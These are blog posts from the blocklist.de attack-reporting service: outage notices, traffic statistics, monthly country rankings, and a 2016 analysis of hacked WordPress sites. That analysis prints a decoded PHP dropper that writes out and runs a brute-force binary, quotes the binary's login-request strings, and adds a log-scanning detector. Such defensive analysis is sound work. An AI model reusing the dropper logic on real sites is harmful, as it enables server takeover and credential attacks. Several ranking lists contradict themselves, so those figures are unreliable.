2010
04.23

The blog of www.blocklist.de is mainly used to archive statistics.

When there is something interesting, it is published here. This includes, for example, new attacks or waves of new patterns, or cases where a kind of attack could be attributed to a botnet or a worm.

2021
04.29

In the last few days, we had some MySQL server issues.

The server crashed and could only be hard-restarted.

Yesterday we did a lot of analysis of the logfiles and optimized settings.

We monitored the server tonight with debug options, and at the moment it looks good.

We will keep watching it so that it runs as stably as before again.

Some queries are now a little bit slower, but we will work next on optimizing them again.

Sorry for the problems.

2021
04.21

In the last years/months it was very quiet around blocklist.de.

Recently we changed a lot behind the system and dropped a lot of reports/attacks that are older than the current two weeks.

Old stuff is already dropped, but not well enough, so we quite often had problems with the MySQL server.

At the moment it looks strange, because the attacks are dropping from ~24k to 7k, but as long as we don't introduce a bug, it will recover in the next days.

And so, yes, blocklist.de is still alive 🙂

But it is a lot of work and I don't have enough time, so it is going slowly.

2019
11.19

In the last few days there were unfortunately bounce mails to the Fail2Ban sender address with a message like:

<fail2ban@blocklist.de>: Command died with status 255

This is now fixed.

There is also another open bug that I am still working on.

The same goes for the statistics, but unfortunately those do not scale well because of the high volume, and I keep running into problems there.

And yes, the project is still alive and will soon be included in VirusTotal 🙂

Recently the interval at which support mails are processed has also become somewhat longer; I am already working on that. All mails that are too old, however, are marked as "resolved" to draw a line.

2016
05.03

Half a year ago, when the first news came up that the updates for Debian LTS were near end of life, we tried to upgrade the blocklist.de systems.
But it was too hard 🙁

Because there were a lot of changes which needed to be fixed manually.

We copied the data to a VPS and worked with it. So we updated the system -> crash... rollback, fixed the error, update -> crash... and again and again...

After roughly 6 months, we had fixed all errors and now run all systems with the latest version of the OS.

After the first stable updates, there were some bugs we did not see, but blocklist.de users informed us and helped us to fix them.

So now the blocklist.de site is almost as fast as the previous system (with a little bit more caching).

Only the Munin pictures are broken at the moment, because there were too many users for the Munin system. But we are working on it, and for most graphs the generation works fine again.

The website has an A+ rating at SSL Labs now:

blocklist.de-ssllabs

https://www.ssllabs.com/ssltest/analyze.html?d=blocklist.de&s=185.21.103.31

 

blocklist.de-ssltools

https://de.ssl-tools.net/webservers/www.blocklist.de

 

 

And also the mail system:

| MX Server                               | Pref | Connect    | Allowed      | Can Use    | TLS Adv    | Cert OK    | TLS Neg    | Sndr OK    | Rcvr OK    |
|-----------------------------------------|------|------------|--------------|------------|------------|------------|------------|------------|------------|
| smtp-mx.blocklist.de [93.180.154.80]    | 10   | OK (134ms) | OK (135ms)   | OK (136ms) | OK (137ms) | OK (442ms) | OK (136ms) | OK (136ms) | FAIL *     |
| smtp-mx2.blocklist.de [46.252.26.16]    | 20   | OK (181ms) | OK (182ms)   | OK (180ms) | OK (180ms) | OK (467ms) | OK (183ms) | OK (187ms) | FAIL *     |
| webserver3.blocklist.de [185.21.103.31] | 70   | OK (140ms) | OK (8,253ms) | OK (131ms) | OK (131ms) | OK (443ms) | OK (132ms) | OK (141ms) | FAIL *     |
| smtp-mx.blocklist.de [93.180.154.80]    | 80   | OK (137ms) | OK (136ms)   | OK (133ms) | OK (133ms) | OK (373ms) | OK (134ms) | OK (136ms) | OK (251ms) |

* = greylisting for the tested address is active.

 

blocklist.de-ssltools-mx

https://de.ssl-tools.net/mailservers/smtp-mx.blocklist.de

What we have already built:

  • Info mail about servers which have sent reports without logfiles
  • Info mail about servers which have not sent any reports for longer than 90 days
  • Info mail about disabled servers in your profile (disabled due to false positives...)

The next steps are:

  • make the HTML and CSS ready for mobile devices
  • a writeable API to add servers or change settings
  • zoomable Munin graphs
  • a live attack map like http://map.honeynet.org/ (currently offline) or http://www.sicherheitstacho.eu/
  • PHP 7 for the site/API/scripts
  • complete the API as a RESTful API
  • rsync access for the RBL data
  • upgrade the abuse reports to the new (larger) DKIM key
  • update the language files (with Google Translate) for French, Chinese and more, so that blocklist.de is available in more languages (and the login sites too)
  • generate the statistics from the blog (the ranking of countries and companies) automatically
2016
01.03

In the last few days we have seen a lot of hacked WordPress/Joomla sites that launch outgoing brute-force login attacks against other WordPress sites.

The attackers create files with the names libso48.php, libso47.php, libso46.php and call them via GET requests with the parameter id:

domain.tld/directory/xxx/xxx/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC

The user agent used is the string "--user-agent":

" --user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"

The malicious files check whether the server runs 32- or 64-bit and write out a file libworker.so.

The libworker.so file performs the attacks.

Code from libso48.php (decoded):

```php
<?php
header("Content-type: text/plain");
// Polyfill for very old PHP versions that lack file_put_contents()
if (!function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (!$f) return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}
//@system("killall -9 ".basename("libworker.so"));
// The two embedded ELF payloads (32-bit and 64-bit); the hex blobs are omitted here
$so32 = Hex-Code;
$so64 = Hex-Code;
//hexcode decoded start
//............
//fork
//INFO Started brute forcing.
//
//path=/wp-content/pluginsINFO SUCCESS: %s
//<!DOCTYPE html<ERROR> (%s:%d: errno: %s)
//can not determine logged in or not.
//INFO exit status: %d
//........
//<ERROR> (%s:%d: errno: %s)
//Error.
//<INFO> (%s:%d: errno: %s)
//Started xml rpc brute force
//.........
//hexcode decoded end

// Detect 32- vs 64-bit PHP via integer overflow and pick the matching payload
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
print "Arch is ".$arch."\n";
$so = $arch == 32 ? $so32 : $so64;
// Copy the EI_OSABI byte (offset 7 of the ELF header) from /usr/bin/host into the
// payload so it matches the host OS; OSABI value 9 means FreeBSD
$f = fopen("/usr/bin/host", "rb");
if ($f) {
    $n = unpack("C*", fread($f, 8));
    $so[7] = sprintf("%c", $n[8]);
    print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
    fclose($f);
}
// Drop the binary as ./libworker, make it executable and start it in the
// background with the id and a parameters taken from the GET request
print "SO dumped ".file_put_contents("./libworker", $so)."\n";
@chmod("libworker", 0777);
//@system("./libworker " . $_GET['id'] . " > /dev/null 2> /dev/null &");
@system("./libworker " . $_GET['id'] . " " . $_GET['a'] . " > out 2> err &");
exit(0);
?>
```

The complete script is decoded at unphp.net (but with the decoded hex code):
http://www.unphp.net/decode/9f6f7e9085045418857e6b54e07b20e9/

The hex code that was written into the libworker.so file contained the following strings:

```text
......

%s
}{
  "type" : "WPBF_RESPONSE",
  "success" : false,
  "site" : "%s",
  "user" : "%s"
}
Sending: %s
{
  "type" : "WPBF_RESPONSE",
  "success" : true,
  "site" : "%s",
  "user" : "%s",
  "pass" : "%s"
}
{}curlhttp://https://%swp-login.php%s/wp-login.phphttp://%swp-login.phphttp://%s/wp-login.phplog=%s&pwd=%s&wp-submit=Log+In&redirect_to=http%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1log=%s&pwd=%s&wp-submit=Log+In&redirect_to=https%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1--user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0--dataCookie:wordpress_test_cookie=WP+Cookie+check-HContent-Type:application/x-www-form-urlencodedCache-Control:max-age=0Accept-Language:en-US;Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8-A-iINFO checking: %s, %s, %s
Success./src/wpbf/bf.c<ERROR> (%s:%d: errno: %s) 
```

You can see that the attacker always uses curl and performs both XML-RPC brute force and normal wp-login.php WordPress brute-force logins.

If you find the libso48.php or libworker.so file in your webspace, please check, clean and update your software and stop the running processes started from the libworker file.
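As an added example (not code from blocklist.de), a small Python detector for the pattern described above: it flags the libsoNN.php dropper calls and the wp-login.php/xmlrpc.php brute-force POSTs carrying the quoted user agent in Apache-style access logs, and lists dropper/worker artifacts by file name in a web root. The log lines and paths are constructed; the file names and the user agent are taken from the post.

```python
import os
import re
from collections import Counter

# The exact user agent the libworker binary passes to curl (quoted in the post above)
BRUTE_UA = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
# GET <anything>/libsoNN.php?...id=...  (the dropper call on the infected host)
DROPPER_RE = re.compile(r'^(\S+) .*"GET (\S*/libso\d+\.php)\?(?:[^" ]*&)?id=')
# POST to wp-login.php or xmlrpc.php; captures source IP and user agent (combined log format)
LOGIN_RE = re.compile(r'^(\S+) .*"POST \S*/(wp-login\.php|xmlrpc\.php)[^"]*" \S+ \S+ "[^"]*" "([^"]*)"')
# File names used by the dropper and by the worker binary it writes
ARTIFACT_RE = re.compile(r'(^|/)(libso\d+\.php|libworker(\.so)?)$')

# Constructed sample access-log lines, not real traffic
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jan/2016:10:12:01 +0100] "GET /wp-content/uploads/x/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Jan/2016:10:12:05 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [03/Jan/2016:10:13:44 +0100] "GET /blog/libso47.php?id=abc HTTP/1.1" 200 210 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [03/Jan/2016:10:20:01 +0100] "POST /wp-login.php HTTP/1.1" 200 3821 "-" "' + BRUTE_UA + '"',
    '203.0.113.9 - - [03/Jan/2016:10:20:02 +0100] "POST /wp-login.php HTTP/1.1" 200 3821 "-" "' + BRUTE_UA + '"',
    '203.0.113.9 - - [03/Jan/2016:10:20:03 +0100] "POST /xmlrpc.php HTTP/1.1" 200 421 "-" "' + BRUTE_UA + '"',
    '198.51.100.7 - - [03/Jan/2016:10:21:00 +0100] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/43.0"',
]

def find_dropper_calls(lines):
    """Return (ip, path) for GET requests to libsoNN.php that carry the id parameter."""
    return [(m.group(1), m.group(2)) for m in map(DROPPER_RE.match, lines) if m]

def count_bruteforce_logins(lines):
    """Count login POSTs per source IP whose user agent is the libworker curl string."""
    counts = Counter()
    for line in lines:
        m = LOGIN_RE.match(line)
        if m and m.group(3) == BRUTE_UA:
            counts[m.group(1)] += 1
    return dict(counts)

def flag_suspicious_paths(paths):
    """Return the paths whose file name matches the dropper or worker artifacts."""
    return [p for p in paths if ARTIFACT_RE.search(p)]

def scan_webroot(root):
    """Walk a web root and return every file named like the dropper or the worker."""
    found = []
    for dirpath, _, names in os.walk(root):
        found.extend(flag_suspicious_paths(os.path.join(dirpath, n) for n in names))
    return found
```

The user-agent match is exact on purpose: a single source IP with many such POSTs in a short window is the signal to block, and a hit from find_dropper_calls on your own server means the host itself is infected.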

2015
03.06

The traffic, load, users and other statistics of blocklist.de for the month 02.2015

Currently, blocklist.de has the following stats/users:

User: 2,144

Server: 2,325

Attacks: 246,084,421 since 01.01.2014

Reports: 10,092,816 since 2012

Daily Mails: ~690,500 (lower limit) ~1,450,000 (upper limit)

Web-Traffic: ~309 GB

RBL-/API-Traffic: ~85 GB

Mail (In/Out)-Traffic: ~3,528 GB

Traffic over IPv6 (Mail, Web..): ~5 GB

On top of this, there is 6.4 TB of traffic between the web/mail servers and the MySQL server. The MySQL server sends out ~8.5 GB each hour.

The MySQL server now uses 62% of 32 GB RAM (~14 GB cache), and the system load is 1.10 on average.

The web server does not use its full 12 GB RAM and the system load is under 0.7. There are ~25,000 open connections at the same time.

The complete traffic from all systems is roughly 6.6 TB in 02/2015 (the traffic from the MySQL server over the non-public IPs is not included).

2015
03.06

Statistics for 10/2014.

The image (up, down, same...) shows the difference from 10/2014 (last statistics):

The arrows show the position compared to the previous month (up, down, unchanged).

Sorted by IP addresses (unique):

  1. 30324 CN
  2. 10486 RU
  3. 9775 US
  4. 9012 NoName
  5. 8925 TW
  6. 7083 UA
  7. 4876 VE
  8. 6421 VN
  9. 4980 IN
  10. 4824 AT

Sorted by number of attacks:

  1. 9278162 CN
  2. 4358200 PL
  3. 3860007 UA
  4. 2058265 NoName
  5. 596001 FR
  6. 430084 US
  7. 248110 RU
  8. 48762 DE
  9. 34456 NoASN
  10. 29661 SE
2015
03.06

After 2 years, we are trying to regenerate the per-country statistics from month to month again.

The image (up, down, same...) shows the difference from 09/2014 (last statistics):

The arrows show the position compared to the previous month (up, down, unchanged).

Sorted by IP addresses (unique):

  1. 28650 CN
  2. 19957 VN
  3. 13776 RU
  4. 9309 US
  5. 7571 IN
  6. 6262 NoName
  7. 4876 VE
  8. 4743 UA
  9. 4633 TW
  10. 4054 BR

Sorted by number of attacks:

  1. 8164637 CN
  2. 4269205 PL
  3. 2593427 UA
  4. 1841862 US
  5. 906412 FR
  6. 715298 NoName
  7. 186913 RU
  8. 41671 VN
  9. 27603 NoASN
  10. 20123 IQ
2014
10.10

The traffic, load, users and other statistics of blocklist.de for the month 09.2014

Currently, blocklist.de has the following stats/users:

User: 1,719

Server: 1,932

Attacks: 282,138,414 since 05.05.2013

Reports: 8,572,275 since 2012

Daily Mails: ~750,400 (lower limit) ~1,250,000 (upper limit)

Web-Traffic: ~290 GB

RBL-/API-Traffic: ~80 GB

Mail (In/Out)-Traffic: ~3,315 GB

Traffic over IPv6 (Mail, Web..): ~5 GB

On top of this, there is 6.1 TB of traffic between the web/mail servers and the MySQL server. The MySQL server sends out ~8.4 GB each hour.

The MySQL server now uses 60% of 32 GB RAM (~14 GB cache), and the system load is 2.40 on average.

The web server does not use its full 12 GB RAM and the system load is under 0.6. There are ~23,000 open connections at the same time.

The complete traffic from all systems is roughly 6.4 TB in 09/2014 (the traffic from the MySQL server over the non-public IPs is not included).

2014
10.09

After 2 years, we are trying to regenerate the per-country statistics from month to month again.

The image (up, down, same...) shows the difference from 2012 (last statistics):

The arrows show the position compared to the previous month (up, down, unchanged).

Sorted by IP addresses (unique):

  1. 29182 CN
  2. 12068 VN
  3. 10280 IN
  4. 8157 US
  5. 7082 RU
  6. 14573 VN
  7. 5651 NoName
  8. 5216 VE
  9. 4054 BR
  10. 3986 UA

Sorted by number of attacks:

  1. 7805582 CN
  2. 6300587 US
  3. 1752518 US
  4. 1533083 PL
  5. 678569 NoName
  6. 537431 FR
  7. 175161 RU
  8. 35833 AT
  9. 35048 DE
  10. 32085 NoASN